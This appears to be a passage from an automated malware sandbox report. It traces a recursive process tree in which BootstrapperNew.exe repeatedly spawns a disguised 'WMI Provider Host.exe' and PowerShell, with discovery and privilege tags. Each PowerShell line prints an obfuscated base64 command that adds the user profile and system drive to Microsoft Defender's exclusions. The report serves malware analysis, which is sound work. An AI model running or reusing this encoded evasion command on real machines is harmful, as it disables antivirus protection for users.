        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4784
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        9⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3088
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        10⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        11⤵
        
        PID:4152
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        11⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        12⤵
        
        PID:3520
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        12⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        12⤵
        
        PID:1260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        13⤵
        
        PID:1992
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        13⤵
        
        PID:624
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        13⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        14⤵
        
        PID:5020
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        14⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        14⤵
        
        PID:1904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        15⤵
        
        PID:4148
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        15⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        15⤵
        
        PID:1568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        16⤵
        
        PID:5284
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        16⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        16⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        17⤵
        
        PID:5612
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        17⤵
        
        PID:5652
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        17⤵
        
        PID:5676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        18⤵
        
        PID:5968
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        18⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        18⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        19⤵
        
        PID:5136
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        19⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        19⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        20⤵
        
        PID:5764
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        20⤵
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        20⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        21⤵
        
        PID:5352
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        21⤵
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        21⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        22⤵
        
        PID:5640
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        22⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        22⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        23⤵
        
        PID:3004
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        23⤵
        
        PID:5380
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        23⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        24⤵
        
        PID:5704
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        24⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        24⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        25⤵
        
        PID:6356
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        25⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        25⤵
        
        PID:6380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        26⤵
        
        PID:6628
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        26⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        26⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        27⤵
        
        PID:6788
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        27⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        27⤵
        
        PID:6832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        28⤵
        
        PID:7136
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        28⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        28⤵
        
        PID:448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        29⤵
        
        PID:6548
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        29⤵
        
        PID:6068
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        29⤵
        
        PID:6580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        30⤵
        
        PID:6408
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        30⤵
        
        PID:7004
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        30⤵
        
        PID:6924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        31⤵
        
        PID:6616
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        31⤵
        
        PID:6304
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        31⤵
        
        PID:6248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        32⤵
        
        PID:5432
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        32⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        32⤵
        
        PID:7048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        33⤵
        
        PID:6656
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        33⤵
        
        PID:6352
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        33⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        34⤵
        
        PID:6840
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        34⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        34⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        35⤵
        
        PID:7172
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        35⤵
        
        PID:7180
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        35⤵
        
        PID:7224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        36⤵
        
        PID:7440
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        36⤵
        
        PID:7492
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        36⤵
        
        PID:7556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
